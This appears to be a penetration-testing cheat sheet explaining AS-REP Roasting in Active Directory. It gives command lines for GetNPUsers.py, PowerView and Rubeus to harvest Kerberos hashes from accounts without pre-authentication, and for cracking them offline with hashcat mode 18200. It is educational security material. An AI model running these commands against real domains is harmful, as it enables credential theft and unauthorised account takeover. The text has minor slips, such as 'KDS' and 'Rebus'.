AS-REP Roasting

The first phase of Kerberos where the client sends the encrypted timestamp with the password hash and the KDC returns the TGT only if it is valid, is called pre-authentication. If it is not present or is disabled, the client sends a TGT request specifying the username and the KDS returns the encrypted TGT with the hash of the user's password. However, this allows an attacker to make a false request for a certain user, obtain the encrypted TGT with the hash of that user's password and then perform offline cracking. By default, not requiring pre-authentication is disabled, but it is possible to enable it and you can often find configurations where it is enabled.

Attack

Remotely

Linux

impacket-GetNPUsers will attempt to list and get TGTs for those users who have the property "Do not require Kerberos pre-authentication". You must have the credentials of a domain user to perform the extraction.

GetNPUsers.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>

GetNPUsers.py -dc-ip <IP_DC> -request -outputfile <OutputFile> <DOMAIN>/<USER[:PASSWORD]>

Offline cracking of file <OutputFile> with hashcat (-m 18200)

Locally

Windows

Since we are already in a windows system belonging to the domain, we do not need to specify username and password.

With PowerView you can see accounts with no pre-authentication required.

Get-DomainUser PreauthNotRequired

We can use Rebus to perform the AS-REP Roasting attack.

.\Rubeus.exe asreproast /nowrap 

.\Rubeus.exe asreproast /format:hashcat /outfile:<OutputFile>

Offline cracking of file <OutputFile> with hashcat (-m 18200)